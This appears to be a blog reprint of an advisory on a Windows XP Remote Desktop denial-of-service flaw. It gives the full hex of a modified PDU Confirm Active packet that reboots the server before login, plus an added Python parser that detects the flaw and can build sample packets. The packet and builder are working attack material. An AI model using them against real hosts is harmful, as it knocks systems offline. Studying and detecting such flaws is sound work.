Monday, April 30, 2012

Windows XP Remote Desktop DoS Vulnerability

Vulnerable:
Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable:
Microsoft Windows 2000 Server

Background:
Windows XP Professional is exposed to a remote denial of service when Remote Desktop is enabled. Remote Desktop is XP Professional's single-user RDP server (Terminal Services).

Discussion:
At the start of the protocol there is a negotiation of client and server graphics capabilities, in a packet called PDU Confirm Active. A block of 32 bytes in this packet allows the client to disable the drawing commands that it does not support.

One of these apparently controls whether the Pattern BLT command is sent. On Windows 2000 Server, disabling this command will make the server send bitmaps instead of Pattern BLT commands. However, Windows XP Professional apparently reboots when it tries to render patterns; since this happens while the login screen is being drawn, this does not require the client to have logged on or authenticated to the server. This applies to all versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also reproducible with Windows .NET Standard Server Beta 3.

Workaround:
Disable Remote Desktop (from Control Panel, System, Remote, Remote Desktop, deselect the option "Allow users to connect remotely to this computer").

Exploit:
Shown below are the unencrypted packet contents of the problematic PDU Confirm Active packet. The only change is from 01 to 00 on the line indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00   <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
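As an added example (not part of the original advisory), a small Python parser that walks the capability sets of an unencrypted PDU Confirm Active and reports whether the Pattern BLT entry of the 32-byte order-support block is cleared, which is the condition described above and the thing a monitor in front of a Terminal Services host would want to log. The field layout follows the public MS-RDPBCGR description of the PDU; the sample packets the block builds are constructed test input, not captures.

```python
import struct

CAPSTYPE_ORDER = 0x03   # Order capability set, "03 00 58 00" in the dump above
PATBLT_INDEX = 1        # second entry of the 32-byte orderSupport block

def parse_confirm_active(pdu: bytes) -> dict:
    """Split an unencrypted Confirm Active PDU into {capability type: body}."""
    # shareControlHeader (6) + shareId (4) + originatorId (2) + two lengths (4)
    total_len, pdu_type, _src, share_id, _orig, desc_len, caps_len = struct.unpack_from("<HHHIHHH", pdu, 0)
    if total_len != len(pdu) or (pdu_type & 0x0F) != 0x03:
        raise ValueError("not a well-formed Confirm Active PDU")
    off = 16 + desc_len                       # skip the source descriptor ("MSTSC\0")
    num_caps = struct.unpack_from("<H", pdu, off)[0]
    off += 4                                  # numberCapabilities + pad2Octets
    end = 16 + desc_len + caps_len            # caps_len covers the count and all sets
    caps = {}
    for _ in range(num_caps):
        cap_type, cap_len = struct.unpack_from("<HH", pdu, off)
        if cap_len < 4 or off + cap_len > end:
            raise ValueError("capability set overruns the PDU")
        caps[cap_type] = pdu[off + 4:off + cap_len]
        off += cap_len
    return {"share_id": share_id, "caps": caps}

def order_support(caps: dict) -> bytes:
    """The 32-byte per-order enable block inside the Order capability set body:
    terminalDescriptor(16) + pad(4) + six 2-byte fields precede it."""
    return caps[CAPSTYPE_ORDER][32:64]

def patblt_disabled(pdu: bytes) -> bool:
    """True when the client has switched Pattern BLT off (the byte changed 01 -> 00)."""
    return order_support(parse_confirm_active(pdu)["caps"])[PATBLT_INDEX] == 0

def build_sample(patblt: int) -> bytes:
    """Constructed minimal Confirm Active PDU carrying only an Order capability set.
    Test fixture for the parser; the values mirror the dump above but it is not a capture."""
    support = bytearray(32)
    support[0], support[PATBLT_INDEX], support[2] = 1, patblt, 1   # DstBlt, PatBlt, ScrBlt
    order_body = (bytes(16) + bytes(4) + struct.pack("<HHHHHH", 1, 20, 0, 1, 0, 0x2A)
                  + bytes(support) + bytes(20))                   # 84 bytes, set length 0x58
    order_cap = struct.pack("<HH", CAPSTYPE_ORDER, 4 + len(order_body)) + order_body
    caps = struct.pack("<HH", 1, 0) + order_cap                   # one capability set
    desc = b"MSTSC\x00"
    total = 16 + len(desc) + len(caps)
    return struct.pack("<HHHIHHH", total, 0x13, 1008, 0x103EA, 1002, len(desc), len(caps)) + desc + caps

if __name__ == "__main__":
    print("PatBlt disabled:", patblt_disabled(build_sample(0)))  # True for the modified packet
```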

References:
Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals for telematic services, ITU-T.
